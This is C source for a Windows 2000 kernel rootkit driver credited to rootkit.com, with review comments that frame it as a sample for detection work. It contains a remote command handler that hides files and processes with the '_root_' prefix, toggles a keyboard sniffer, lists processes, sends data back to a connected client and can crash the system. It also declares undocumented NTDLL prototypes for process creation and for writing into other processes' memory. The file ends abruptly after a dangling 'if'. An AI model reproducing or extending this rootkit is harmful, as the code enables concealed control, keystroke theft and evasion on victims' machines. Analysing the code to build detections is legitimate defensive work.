#include "rk_driver.h"
#include "rk_command.h"
#include "rk_defense.h"
#include "rk_process.h"
// Runtime toggles flipped by process_rootkit_command() below through the
// 'hidedir', 'hideproc' and 'sniffkeys' commands.  Nothing in this file reads
// them; the hooks that honour them live in other modules of the driver.
// NOTE(review): they are presumably written on the command path and read
// concurrently by those hooks with no synchronisation — confirm before
// relying on a consistent value.  The initialisers mean the two hiding
// features are active from the moment the driver loads, which is worth
// knowing when building detections for this sample.
BOOL g_hide_directories = TRUE;   // 'hidedir': hide files/dirs whose name starts with the prefix named in the help text
BOOL g_hide_proc = TRUE;          // 'hideproc': hide processes whose name starts with that prefix
BOOL g_sniff_keys = FALSE;        // 'sniffkeys': keystroke capture; also forced off when an empty command arrives
// Single global scratch message; not referenced anywhere in the visible part
// of this file.  The member types come from the project headers, and the
// layout — a PORT_MESSAGE header followed by a CSRSS_MESSAGE, process
// information, a debugger CLIENT_ID, creation flags and VDM data — looks like
// an LPC request sent to CSRSS on process creation.  NOTE(review): that
// reading is inferred from the field names only; verify against the header
// definitions.  Because it is one static instance it cannot be used
// re-entrantly or from more than one thread at a time.
struct _csrmsg {
    PORT_MESSAGE PortMessage;                // presumably the LPC message header — confirm
    struct CSRSS_MESSAGE CsrssMessage;
    PROCESS_INFORMATION ProcessInformation;
    CLIENT_ID Debugger;
    ULONG CreationFlags;
    ULONG VdmInfo[2];
} csrmsg;
////////////////////////////////////////////////////////////////////
// these functions are dynamically linked out of NTDLL since
// they are not exported.
////////////////////////////////////////////////////////////////////
// Hand-written function-pointer prototypes for NTDLL-internal routines.  None
// of these typedefs is used in the visible portion of this file.  The real
// signatures are undocumented and differ between Windows builds (parameter
// count, ULONG vs. SIZE_T length arguments, reserved parameters), so a call
// made through a mismatched prototype corrupts the caller's stack or arguments
// — each one must be checked against the exact target build before any
// address resolved at run time is invoked through it.
typedef NTSTATUS (*CsrClientCallServer) (
    IN PVOID Message,
    IN PVOID,                                // unnamed in the original; its role is not recoverable from this file
    IN ULONG OpCode,
    IN ULONG Size
);
// Writes Buffer into another process's address space; length type per build.
typedef NTSTATUS (*ZwWriteVirtualMemory) (
    IN HANDLE hProcess,
    IN PVOID BaseAddress,
    IN PVOID Buffer,
    IN ULONG BytesToWrite,
    OUT PULONG BytesWritten
);
// Left unfinished in the original source; kept for reference only.
//typedef NTSTATUS (*GetEnvironmentStringsW) (
// ...
//);
// Frees a PROCESS_PARAMETERS block produced by RtlCreateProcessParameters.
typedef NTSTATUS (*RtlDestroyProcessParameters) (
    IN PPROCESS_PARAMETERS ProcessParameters
);
// Builds the PROCESS_PARAMETERS block for a new process; the caller owns the
// result and is expected to release it with RtlDestroyProcessParameters.
typedef NTSTATUS (*RtlCreateProcessParameters) (
    OUT PPROCESS_PARAMETERS *ProcessParameters,
    IN PUNICODE_STRING ImageFile,
    IN PUNICODE_STRING DllPath OPTIONAL,
    IN PUNICODE_STRING CurrentDirectory OPTIONAL,
    IN PUNICODE_STRING CommandLine OPTIONAL,
    IN ULONG CreationFlags,
    IN PUNICODE_STRING WindowTitle OPTIONAL,
    IN PUNICODE_STRING Desktop OPTIONAL,
    IN PUNICODE_STRING Reserved OPTIONAL,
    IN PUNICODE_STRING Reserved2 OPTIONAL
);
// Decrements a thread's suspend count; previous count returned via pSuspendCount.
typedef NTSTATUS (*ZwResumeThread) (
    IN HANDLE hThread,
    OUT PULONG pSuspendCount
);
// Changes page protection on a region; BaseAddress/RegionSize are rounded by
// the kernel and returned in place, hence IN OUT.
typedef NTSTATUS (*ZwProtectVirtualMemory) (
    IN HANDLE hProcess,
    IN OUT PVOID *BaseAddress,
    IN OUT PULONG RegionSize,
    IN ULONG Protect,
    OUT PULONG OldProtect
);
// Native process-object creation from a section; the initial thread is not
// created here.
typedef NTSTATUS (*ZwCreateProcess) (
    OUT PHANDLE phProcess,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN HANDLE hParentProcess,
    IN BOOLEAN bInheritParentHandles,
    IN HANDLE hSection OPTIONAL,
    IN HANDLE hDebugPort OPTIONAL,
    IN HANDLE hExceptionPort OPTIONAL
);
// Opens an existing file by OBJECT_ATTRIBUTES; status details land in pIoStatusBlock.
typedef NTSTATUS (*ZwOpenFile) (
    OUT PHANDLE phFile,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK pIoStatusBlock,
    IN ULONG ShareMode,
    IN ULONG OpenMode
);
////////////////////////////////////////////////////////////////////
// commands passed from the kernel shell are handled here
//
////////////////////////////////////////////////////////////////////
void process_rootkit_command(char *theCommand)
{
char _c[256];
BOOL return_prompt = TRUE;
sprintf(_c, "rootkit: process_rootkit_command %s, len %d", theCommand, strlen(theCommand));
DbgPrint(_c);
if(0 == strlen(theCommand))
{
//the user pressed return, which is meant to break out
//of sniffer-modes - so make sure all sniffers are off
if(g_sniff_keys)
{
char _t[] = "------------------------------------------\r\nsniffkeys is now OFF.\r\n";
g_sniff_keys = FALSE;
ReturnDataToClient(_t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'help'
// return a help string
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "help"))
{
char _help[] = "Win2K Rootkit by the team rootkit.com\r\n" \
"Version 0.4 alpha\r\n" \
"------------------------------------------\r\n" \
"command description \r\n" \
"\r\n" \
"ps show proclist \r\n" \
"help this data \r\n" \
"buffertest debug output \r\n" \
"hidedir hide prefixed file/dir\r\n" \
"hideproc hide prefixed processes\r\n" \
"debugint (BSOD)fire int3 \r\n" \
"sniffkeys toggle keyboard sniffer\r\n" \
"echo <string> echo the given string\r\n" \
"\r\n*(BSOD) means Blue Screen of Death\r\n" \
"if a kernel debugger is not present!\r\n" \
"*'prefixed' means the process or filename\r\n" \
"starts with the letters '_root_'.\r\n" \
"\r\n";
ReturnDataToClient(_help, strlen(_help));
}
////////////////////////////////////////////////////////////////
// Command: 'echo' 'string'
// echo back the string, useful for rootkit patches that need
// to send data to a connected client
////////////////////////////////////////////////////////////////
else if(0 == memcmp(theCommand, "echo ", 5))
{
int l = strlen(&theCommand[5]);
if(l)
{
return_prompt=FALSE;
ReturnDataToClient(&theCommand[5], l);
}
}
////////////////////////////////////////////////////////////////
// Command: 'ps'
// returns the process list running on the host
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "ps"))
{
command_get_proclist();
}
////////////////////////////////////////////////////////////////
// Command: 'buffertest'
// debug function causes a large number of packets to return
// used to debug the TCP/IP stack functionality
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "buffertest"))
{
int count=0;
for(count=0;count<100;count++)
{
int x;
sprintf(_c, ".%d.", count);
x = strlen(_c);
ReturnDataToClient(_c, x);
}
}
////////////////////////////////////////////////////////////////
// Command: 'sniffkeys'
// toggles keyboard sniffer
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "sniffkeys"))
{
if(g_sniff_keys)
{
char _t[] = "keyboard sniffing now OFF\r\n";
g_sniff_keys = FALSE;
ReturnDataToClient( _t, strlen(_t));
}
else
{
char _t[] = "keyboard sniffing now ON\r\n------------------------------------------\r\n";
return_prompt=FALSE;
g_sniff_keys = TRUE;
ReturnDataToClient( _t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'hidedir'
// toggles directory hiding with '_root_' prefix
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "hidedir"))
{
if(g_hide_directories)
{
char _t[] = "directory prefix-hiding now OFF\r\n";
g_hide_directories = FALSE;
ReturnDataToClient( _t, strlen(_t));
}
else
{
char _t[] = "directory prefix-hiding now ON\r\n";
g_hide_directories = TRUE;
ReturnDataToClient( _t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'hideproc'
// toggles process hiding with '_root_' prefix
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "hideproc"))
{
if(g_hide_proc)
{
char _t[] = "process prefix-hiding now OFF\r\n";
g_hide_proc = FALSE;
ReturnDataToClient( _t, strlen(_t));
}
else
{
char _t[] = "process prefix-hiding now ON\r\n";
g_hide_proc = TRUE;
ReturnDataToClient( _t, strlen(_t));
}
}
////////////////////////////////////////////////////////////////
// Command: 'debugint'
// debug function causes a debug interrupt to fire
// this will BSOD the machine unless a kernel debugger is
// present.
////////////////////////////////////////////////////////////////
else if(0 == strcmp(theCommand, "debugint"))
{
__asm int 3
}
else
{
char t[256];
sprintf(t, "error: unknown or malformed command %s\r\n", theCommand);
ReturnDataToClient( t, strlen(t));
}
if(return_prompt)
//this is our prompt, an upside-down question-mark